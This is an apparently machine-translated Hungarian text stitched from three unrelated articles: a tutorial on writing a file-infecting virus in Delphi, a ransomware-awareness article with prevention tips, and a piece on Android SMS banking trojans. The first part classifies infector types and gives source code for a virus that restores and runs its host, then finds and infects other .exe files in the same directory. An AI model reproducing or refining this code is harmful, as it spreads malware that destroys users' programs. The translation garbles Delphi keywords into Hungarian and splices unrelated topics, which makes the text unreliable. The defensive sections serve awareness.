Osztályozás

HLLO- Magas szintű nyelvi felülírás. Az ilyen vírus felülírja a programot a testével. Azok.
a program megsemmisül, és amikor a felhasználó megpróbálja futtatni a programot, a vírus elindul és tovább "fertőz".

HLLC – High Level Language Companion. A legtöbb ilyen vírus az ókorba nyúlik vissza (8-10 évvel ezelőtt), amikor a felhasználók DOS-szal rendelkeztek és nagyon lusták voltak. Ezek a vírusok keresnek egy fájlt, és anélkül, hogy megváltoztatnák, másolatot készítenek magukról, de .COM kiterjesztéssel. Ha egy lusta felhasználó ír rá parancs sor csak a fájl nevét, majd a DOS először megkeresi a COM fájlt, elindítja a vírust, amely először elvégzi a feladatát, majd elindítja az EXE fájlt. Van még egy módosítás
HLLC - modernebb (7 év;)): A vírus átnevezi a fájlt, megtartja a nevet, de megváltoztatja a kiterjesztést - EXE-ről mondjuk OBJ-re vagy MAP-ra. A vírus az eredeti fájlt a törzsével helyettesíti. Azok. a felhasználó elindít egy vírust, amely a szaporodási művelet végrehajtása után elindítja a kívánt programot - mindenki boldog.

HLLP – Magas szintű nyelvi parazita. A legfejlettebb. Jelölje be testüket az előtte lévő fájlnak (a vírus először elindul, majd visszaállítja a programot és lefuttatja) vagy mögötte
- majd a program fejlécébe írjuk, hogy jmp near a vírus testére, elvégre az indul először.

Magát a programot változatlanul hagyhatjuk, ekkor így fog kinézni:

Mi az az MZ, azt hiszem kitaláltad 🙂 Ezek a szeretett Mark Zbikowski kezdőbetűi, amit szerényen aláírásként azonosított .exe fájl a 🙂 És csak azért írtam ide őket, hogy megértsd
- a fertőzés a copy /b virus.exe program.exe elve szerint történik, és itt nincsenek különösebb viccek. Nem most. De összehozzuk őket veled
- egészségesnek lenni:). Nos, például: az eredeti program első 512 vagy több bájtját titkosíthatja bármilyen Ön által ismert algoritmussal - XOR/XOR, NOT/NOT, ADD/SUB, akkor így fog kinézni:

Ebben az esetben a fertőzött fájl szerkezete nem lesz olyan egyértelmű.
Nem hiába vagyok itt (az osztályozásban, az értelemben) ennyire keresztre feszítve
- 90%-ban parazita algoritmust használnak modern vírusok, elterjedési módjuktól függetlenül. Oké, menjünk tovább:

hálózati vírus. A fentiek bármelyike ​​lehet. Abban különbözik, hogy eloszlása ​​nem
egy számítógépre korlátozódik, ez a fertőzés valahogy átmászik az interneten vagy helyi hálózat más autókra. Szerintem rendszeresen kivesz 3-4 ilyen barátot a szappandobozból
- itt van egy példa egy hálózati vírusra. És ha valaki más számítógépére került, akkor tetszőleges módon vagy egyáltalán nem fertőz meg fájlokat.

Makróvírusok, script vírusok, IRC vírusok. Azért tettem őket egy csoportba, mert alkalmazásokba beépített nyelveken írt vírusok (MSOffice :)), szkriptek (a kedvenc VBS-szabályaid itt) és IRC szkriptek. Szigorúan véve, amint egy kellően erős (és/vagy szivárgó) script komponens megjelenik valamelyik alkalmazásban, a vírusok azonnal írni kezdenek rá 😉 A makróvírusok egyébként nagyon egyszerűek és könnyen felismerhetők a heurisztikával.

kódolás

Megkaptuk 🙂 Gyerünk, futtasd a delphit, ölj meg mindenféle ablakot, és töröld ki az összes hülyeséget a projektablakból. Vagyis általában töröljön mindent 🙂 Csak a következőket tartalmazó DPR-rel fogunk dolgozni:

program EVIL_VIRUS;
WINDOWS, SYSUTILS HASZNÁLATA;
kezdődik
vége;

Szerintem a besorolásból már megértetted a vírus logikáját - állítsd vissza és futtasd a programot --> várd meg a befejezését --> töröld a "végrehajtott fájlt" (elfelejtettem mondani - NEM GYÓGYÍTJUK MEG a fertőzött programot, mi vigye át az eredeti kódot a bal oldali fájlba, és futtassa. PÉLDA: Fertőzött fájl NOTEPAD.EXE Hozza létre a _NOTEPAD.EXE fájlt ugyanabban a könyvtárban az eredeti kóddal, és futtassa már).--> keressen egy nem fertőzött fájlt, és fertőzze meg. Ennyi az egész 🙂 A vírus alapkialakja így néz ki.

Mondja el most hatalmas agyának a következő változókat és állandókat:

VaR VirBuf, ProgBuf, MyBuf: karakterek tömbje;
SR: TSearchRec;
My,pr: Fájl;
ProgSize,eredmény: integer;
PN,st: String;
si:Tstartupinfo;
p:tprocessinformation;
fertőzött: logikai;
CONST VirLen: longint= 1000000;

Az első sor a dinamikus tömbök, amelyekbe a vírus törzsét, illetve a programot írjuk; Az SR változó felírásra kerül
a fertőzésre jelölt fájl jellemzői (remélem, ismeri a FindFirst és FindNext eljárásokat, mert rosszabb lesz;)), Saját és
A Pr az a fájl, ahonnan elindultunk, és a bal oldali fájl az eredeti programkóddal (erről már írtam fent). eredmény - a FindFirst művelet eredménye, nullával egyenlőnek kell lennie,
ProgSize - programkód mérete. A többi világos a következőkből, kivéve
fertőzött - ez a talált fájl fertőzésének jele és
A VirLen a víruskód hossza, csak az esküvő után ismeri fel. Ugh, az összeállítás után akartam mondani. Azok. lefordítod, megváltoztatod a konstans értékét a forráskódban és újrafordítod.
Kódozzon tovább 🙂 Itt láthatja a fertőzött program visszaállításáért és futtatásáért felelős kódot:

SetLength(virbuf,VirLen);
AssignFile(my,ParamStr(0));
st:=paramstr(0);
St:= st+#0;
CopyFile (@st,"c:\windows\program.exe",false);
IF FileSize(my)> VirLen akkor
kezdődik
//Indítsa el a programot
AssignFile(my,"c:\windows\program.exe);
reset(my);
ProgSize:= FileSize(my)-VirLen;
BlockRead(my,virbuf,virlen);
SetLength(progbuf,pRogSize);
BlockRead(my,progbuf,progSize);
CloseFile(my);
PN:= "_"+ParamStr(0);
Fájl hozzárendelése(pr,pn);
ReWrite(pr);
BlockWrite(pr,progbuf,progSize);
CloseFile(pr);
FillChar(Si, SizeOf(Si) , 0);
Si do-val
kezdődik
cb:= SizeOf(Si);
dwFlags:= startf_UseShowWindow;
wShowWindow:= 4;
vége;
PN:= PN+#0;
Createprocess(nil,@PN,nil,nil,false,Create_default_error_mode,nil,nil,si,p);
várjonegyobjektumra(p.hProcess,végtelen);
//Elindult, a program befejeződött. Töröljük ki 🙂
ErAsE(pr);
Erase(my);

Itt elvileg minden egyszerű és világos, kivéve azt, hogy miért vittem át a teljes fertőzött fájlt a Windows könyvtárba, és mit csinálnak a 3-tól 5-ig terjedő sorok.
És megtettem, mert olvasni kell futó fájl kényelmetlen, és csak a CreateFile és a ReadFile WinAPI használatával lehetséges. A WinAPI-n történő kódolásról később lesz szó, most csak az alapokra térek ki
- Delphiben.

Ezek a sorok a string átalakítása pchar-ra népi módon, hiszen most minden kódbájtért harcolunk. Még egy pont: helytelenül jártam el, amikor olyan keményre állítottam a c:\windows elérési utat. Inkább használja a GetWindowsDirectory eljárást, biztosan tájékozódjon 🙂 Minden más egyértelmű megjegyzés nélkül (ha nem
hagyd abba az informatika kihagyását;)), menjünk tovább:

result:= FindFirst("*.exe",faAnyFile,sr);
WHILE Eredmény= 0 DO
kezdődik
// Tetvek ellenőrzése
fertőzött:= false;
IF DateTimeToStr (FileDateToDateTime (fájl (sr.name)))= "08/03/98 06:00:00", akkor fertőzött:= igaz;
//Ellenőrizve!
IF (fertőzött = false) és (szr.név<>paramstr(0)) akkor
kezdődik
AssignFile(my,sr.Name);
ReWrite(my);
BlockWrite(my,virbuf,virlen);
BlockWrite(my,progbuf,sr.Size);
CloseFile(my);
FileSetDate (sr.Name,DateTimeToFileDate(StrToDateTime("08/03/98 06:00:00")));
vége;
vége;

//Ha a vírus "tisztán" fut, pl. nem fertőzött programból, akkor lépjen ki
end else megáll;

Mi a tiéd éles szem lát itt? Így van, a FindFirst eljárás megkeres egy adott áldozatot (bármilyen exe fájlt az aktuális könyvtárból), átviszi a jellemzőit az SR változóba. Ezután ellenőriznie kell a fertőzést. Ez eredeti módon történik: fertőzött fájlhoz def. dátum és idő. És minden ilyen tulajdonságú fájl fertőzöttnek minősül. Minden más megint obszcén egyszerű, így simán rátérek a következtetésre 🙂

Következtetés

Tehát kódoltuk az első vírusunkat. Eddig csak az aktuális könyvtárban lévő fájlokat képes megfertőzni (bár biztos vagyok benne, hogy könnyen frissíthető;)), más könyvtárakról és az internetről pedig semmit sem tud. Ne essen kétségbe, hamarosan elindítjuk. Egyelőre játsszon ezekkel a sorokkal, és várja meg a következő cikket.

Alkalmazás

Megkockáztatom, hogy a cikkben használt összes eljárást leírjam. Ez segít megkeresni őket a súgóban, és felkészülni a súlyos vírusok kódolására
WinAPI.

AssignFile – nincs analóg a WinAPI-ban – leképezi a fájlt
Val vel típusú változó Fájl vagy TextFile

Reset – a _lopen és a CreateFile analógjai – megnyílik
meglévő fájlt, és állítsa be a pozíciót
olvasó felső

ReWrite - _lcreate és CreateFile - létrehoz új fájlés
száj olvasási pozíciót az elejéig. Ha etetik
Írjon újra egy meglévő fájlt, annak tartalmát
vissza lesz állítva

BlockRead - _lread és ReadFile - beolvas a pufferbe
bizonyos mennyiségű adatot egy fájlból

BlockWrite - _lwrite és WriteFile - írja
adatokat fájlba

SeekFile - _llseek és SetFilePointer - mozgatási pozíció
olvasás/írás nyitott fájlra

A CloseFile - _lclose és CloseHandle - bezárja a megnyitást
fájlt

Erase - DeleteFile - fájl törlése

FindFirst - FindFirstFile - fájl keresése kritériumok szerint

FindNext - FindNextFile - keresse meg a következő fájlt

Hívjátok az ördögűző adminokat srácok! A főkönyvelő elkapott egy erős vírust, minden eltűnt! Gyakori, gyakori helyzet az emberi tényező, a friss vírustrendek és a hackerek elszántsága alapján. És tényleg, minek beleásni magát valaki más szoftverébe, ha ebben támaszkodhat a cég alkalmazottaira.

Igen, a nagy állami és magáncégek termékeit folyamatosan feltörik, pedig több száz tapasztalt ember dolgozik azok létrehozásán és támogatásán.

És még inkább, egy hétköznapi embernek nincs kifogása a hackerekkel szemben. Ugyanakkor senkinek sem kell egy magányos fiók, a hackerek célja az, hogy a potenciális áldozatok nagy bázisát megszerezzék és feldolgozzák lánclevéllel, spammel vagy vírusokkal. És mi magunk terjesztünk minden személyes-nyilvános információt jobbra és balra.

Legújabb vírustrendek

A legújabb vírusok és hackelési technikák megkülönböztető jellemzője, hogy egy személlyel lépnek kapcsolatba, nem pedig egy rendszerrel. Vagyis maga az áldozat indítja el a folyamatot. Ez az úgynevezett " szociális tervezés"- az információhoz való illegális hozzáférés módszere, amely az emberi pszichológia jellegzetességein alapul. És ha korábban a támadóknak valódi nyomozókká kellett válniuk, felkutatni célpontjaikat, kommunikálni, néha még egy feltört cégnél is elhelyezkedni, akkor most köszönetet mondhatunk. közösségi hálózatok. Nagymértékben leegyszerűsítették és felgyorsították az információgyűjtés folyamatát.

A célpont VK-n, Twitteren, FB-n és Instagramon áthaladva megkaphatja egy személy pontos profilját telefonszámával, e-mail címével, szülei, barátai nevével és egyéb adataival. És mindez ingyenes és önkéntes – használd, kedves!

Mi van, ha a csalók hozzáférnek vállalati posta egyik alkalmazottja, a spam nem csak a vállalaton belül mindenkit fenyeget, hanem ügyfeleit is. Egy másik esetben a hackerek hosszú időre letiltják az alkalmazott számítógépét úgy, hogy valamilyen "jelentést" küldenek postára.

A hackerek támadásokat terveznek azok ellen, akik értékes információkkal dolgoznak – titkárok, menedzserek, könyvelők, HR-esek.

Mivel a dokumentumok, rendszerek, webhelyek visszaállítása vagy jelszavak beszerzése elég fillérekbe kerül meg kell értenünk, mivel állunk szemben. Annak érdekében, hogy ezek a "szociális mérnökök" ne tudjanak befizetni Önt, elemezzük az egyik legújabb vírussémát.

"kriptusok"

A ransomware vírus terjed email komoly iratok leple alatt: bírósági idézések, számlák, adóhivatali megkeresések. És annak érdekében, hogy ne telepítse saját maga, mindkét irányban meg kell néznie. Technikusaink kifejezetten egy ilyen vírust elemeztek, így megmutatjuk, mire kell figyelnie:

Követjük ezeknek a varázslóknak a kezét:

  • Fenyegető cím. A „Bíróságon való megjelenésre vonatkozó felszólítás” azt jelenti, hogy „Idézés a bíróságra”. A srácok megpróbálják megfélemlíteni és rákényszeríteni a felhasználót, hogy nyissa fel a levelet.
  • A feladó címe - [e-mail védett] Ebből egyértelműen látszik, hogy ez nem egy hivatalos levél, hanem egy spammer/hacker.
  • Levéltár. Van ott egy fájl, aminek azonnal figyelmeztetnie kell (a fájl neve tartalmazza a .doc fájlt, de a js kiterjesztést – a vírus Word dokumentumnak álcázza magát)

Figyelem! Ha a számítógépet ransomware fertőzte meg, akkor 95% -os valószínűséggel az információ örökre elveszik. A rosszindulatú fájl letöltése és elindítása után hívás érkezik egy távoli szerverre, amelyről a víruskód letöltődik. A számítógépen található összes adat véletlenszerű karaktersorozattal van titkosítva.

A fájlok "dekódolásához" olyan kulcsra lesz szükség, amivel csak egy hacker rendelkezik. A csaló azt ígéri, hogy bizonyos összegért visszafejti az információkat, de korántsem biztos, hogy ez megtörténik. Minek? Sokkal könnyebb pénz és adatok nélkül hagyni az embert: szerződések, cselekmények, megbízások, bármilyen értékes és érzékeny információ. Szóval, mivel foglalkozol biztonsági mentések különösen fontos dokumentáció, jobban fog aludni. Ebben a helyzetben ez az egyetlen 100%-os védelem a vírusok ellen.

Ügyeljen a fenti funkciókra, és megelőzheti a számítógépek blokkolásának és törlésének veszélyes eseteit fontos információ. Mindenesetre a kritikus sérülékenységek következményeinek kijavítása sokkal drágább lesz, mint az óvintézkedések megtétele.

Íme tehát további 6 tipp a vírusok kimutatására és a fertőzések megelőzésére:

1. Rendszeresen frissítse operációs rendszerét és programjait. Az alapértelmezés szerint automatikusan telepített fontos frissítések letilthatók. De ne tegye, mert az új verziók gyakran bezárják a szoftverbiztonságban felfedezett lyukakat.

2. Telepítsen egy víruskeresőt, és rendszeresen frissítse a vírusadatbázist. Minden nap 100 ezer új vírus érkezik!

3. Engedélyezze a fájlkiterjesztések megjelenítését: Vezérlőpult\Mappabeállítások\Nézet\Speciális beállítások, törölje a jelet az "Ismert fájltípusok kiterjesztésének elrejtése" jelölőnégyzetből, majd kattintson az OK gombra. Így mindig a valódi fájlkiterjesztést fogja látni. Leggyakrabban a maszkolt vírusok így néznek ki: fájlnév.doc.js és fájlnév.pdf.exe. A valódi fájlkiterjesztés a js és az exe, és minden, ami előttük van, a fájlnév része.

4. Készítsen biztonsági másolatot fontos fájljairól – munkahelyi dokumentumokról és fényképekről. Periodikaság Tartalékmásolat a fájlváltás gyakoriságától függően kell választania. Biztonsági mentéshez használhat felhőszolgáltatást, ha lehetővé teszi a fájlok régebbi verzióihoz való visszatérést és a kézi szinkronizálás beállítását. Ekkor számítógépes fertőzés esetén a vírus nem kerül a felhőbe. Azt is javasoljuk, hogy fontos adatairól egy másolatot őrizzen meg egy archívumban. A legtöbb vírus nem tud behatolni az archívumba, és a számítógép fertőtlenítése után minden archivált információ visszaáll.

5. Növelje szakemberei szakmai műveltségét! Ahogy már említettük, a hackerek a mi pszichológiánkhoz igazítják támadásaikat, és folyamatosan fejlesztik technikáikat. Ne várd el, hogy a cégeden és a csapaton kívül senki mástól kattintson/feltöltse/adja meg adatait. Bárki elkapható, a feladat csak az embernek megfelelő horog kiválasztása. Ezért képezze munkatársait, legalább egyénileg, legalább csapatban, legalább játékos formában, legalább valahogy!

6. Szorosan figyelje a postai leveleket, a vállalati hírnökökben lévő üzeneteket és minden egyéb bejövő információt. Ellenőrizze a feladók e-mail címét, mellékleteit és e-mail tartalmát. A legtöbb vírust manuálisan kell futtatni, mielőtt kárt tehetne a számítógépében.

Nagyon reméljük, hogy ezt a cikket előzetesnek olvassa, és nem azért, mert már minden rossz. Kívánjuk, hogy soha ne találkozzon totális ellenőrizetlen spamekkel, hat hónapig hiányzó dokumentációval és az elkapott vírusok egyéb kellemes következményeivel. Kövesse a fenti hat lépést, tartsa nyitva a szemét, és tartsa titokban adatait!

A felhasználók nem mindig tudják felismerni a vírust a mobiltelefonjukon, és ennek megfelelően nem lehet törölni a rosszindulatú programot, vagy bármilyen intézkedést tenni, mielőtt a vírus hozzáférne a személyes adatokhoz.

A Ebben a pillanatban Az Android okostelefonokat tartják a legsebezhetőbbnek. Új vírus jelent meg SMS-ben Androidon.

Az okostelefonokban nyílt forráskód, ami valójában az operációs rendszer Android, az új vírusok hihetetlen sebességgel terjednek.

Most megváltoztak. Korábban csak mobiltelefonban próbáltak pénzt felhasználni, ma már fegyver alá kerültek bankkártyákés az összes pénzeszköz, amely az Internet Bankban van. A csalókat elsősorban a Mobilbank szolgáltatást támogató okostelefonok érdeklik. Lehetővé teszi, hogy pénzt lopjon az áldozat számlájáról a csaló számára. Ehhez SMS-ben vírust küldenek az Androidnak.

Hogyan működnek a csalók

Az első ilyen vírus 2017 nyár elején vált aktívvá. A veszély az, hogy a trójai távolról működik egy Android okostelefonon.

A támadók SMS-t küldenek a kívánt számra, így annak érdekében, hogy azonosítsák a vírus jelenlétét a mobil kütyükben, az okostelefon-tulajdonosoknak figyelniük kell az egyenként 100 rubel értékű SMS-ek számának növekedésére. Ennek eredményeként az okostelefon tulajdonosának mobilszámlájáról 100-szoros összeget vonnak le.

Annak érdekében, hogy jelentős pénzt keressen, a támadó kénytelen több SMS-trójai programot küldeni áldozata számáról. Végül is nem ő az egyetlen, aki ebben a csaló láncban dolgozik.

A trójai az áldozat kütyüjében foglal helyet, és SMS-eket küld az áldozat számáról a csalók „drága” számára. És ezekért a „drága” számra címzett SMS-ekért az áldozatot egyenként 100 rubel terheli. minden egyes jogosulatlan SMS-ért.

Ebben a rendszerben közvetítők lehetnek távközlési szolgáltatók, szolgáltatók és más partnerek, akik esetleg nem ismerik a csalók trükkjeit. Az összes költség fedezéséhez és pénzkeresethez a támadónak legalább 1000 rubelt kell kivennie minden számból.

Nem zárható ki ugyanakkor, hogy az okostelefon-tulajdonosok pénzlopás miatt panaszt tehetnek üzemeltetőjüknél. Aztán megtorló intézkedéseket tesznek, amelyek megakadályozzák a csalást. Például megadhatják a szükséges bevitelt további megerősítés pénzterhelés előtt stb. Ilyen helyzetben a támadók kénytelenek új csalási módokat keresni.

Ezeknek a tényezőknek köszönhetően egy újabb trójai jelent meg. A Trojan-SMS ezen képviselője távoli szerverről is végrehajt parancsokat.

Új vírus rugalmasabb és tökéletesen orientált bármilyen körülmények között, már figyelembe véve az akadályokat mobilszolgáltató, sőt az előfizető fiókjának állapota és a tranzakciók időpontja is.

Hogyan működik a vírus

Az új vírus szunnyad – nincs függetlensége. Még az okostelefonban sem jelenik meg semmilyen módon. Működéséhez távoli parancsra van szüksége a telefon tulajdonosától.

Ehhez egy úgynevezett POST kérést használnak. Olyan kérésre szolgál, amelyben a webszerver tárolásra elfogadja az üzenet törzsébe foglalt adatokat. Gyakran használják például egy fájl letöltésére.

A POST kérés használatával csatlakozhat a következőhöz távoli szerverés megkapja a megfelelő parancsot, amelynek kézhezvétele után a trójai drága SMS-eket kezd küldeni az áldozatok számairól a csalók számaira.

Hogyan működik az új trójai? Például a program automatikusan SMS-eket küld egy szóval: "BALANCE" egy olyan számra, amely támogatja a "Mobilbankot".

SMS üzenet küldése c rövid szám, a csalók így ellenőrizhetik, hogy az áldozat száma bankszámlához van-e kötve, és mi a számla állapota.

Példák az életből

Például a Sberbanknak van egy száma, ahonnan az üzeneteket küldik - 900. Amikor a 900-as feladótól „BALANCE” (vagy esetleg oroszul „egyenleg”) üzenet érkezik, akkor a telefon tulajdonosa megbízik a Sberbankban és biztosra veszi. hogy ez az üzenet ettől a banktól származik, megnyitja az üzenetet és válaszol rá, tudni akarja, mi történt az egyenleggel. Így a csalók választ kapnak az SMS-ükre, ami számukra azt jelenti, hogy a Bank kártya. Sőt, világossá válik számukra, hogy ez a kártya SMS-parancsokkal vezérelhető, amely a Mobil Banking szolgáltatás részét képezi. És akkor, ahogy mondják, "technológia kérdése".

Egyik barátom a közelmúltban kapott üzenetet a 4-74-1 rövid számról, amely a Sberbank mobilbankjában van regisztrálva, a következő üzenettel: "A szolgáltatás nem elérhető, próbálkozzon újra később." Nyilvánvaló okokból nem küldött választ, mivel már tudott az esetleges fenyegetésekről. Nyilvánvalóan ugyanazokról a csalókról van szó, akik mobilbanknak álcázzák magukat, és így próbálják kiszámítani a reakcióját, és megállapítani, hogy van-e mobilbank telepítve az okostelefonjára.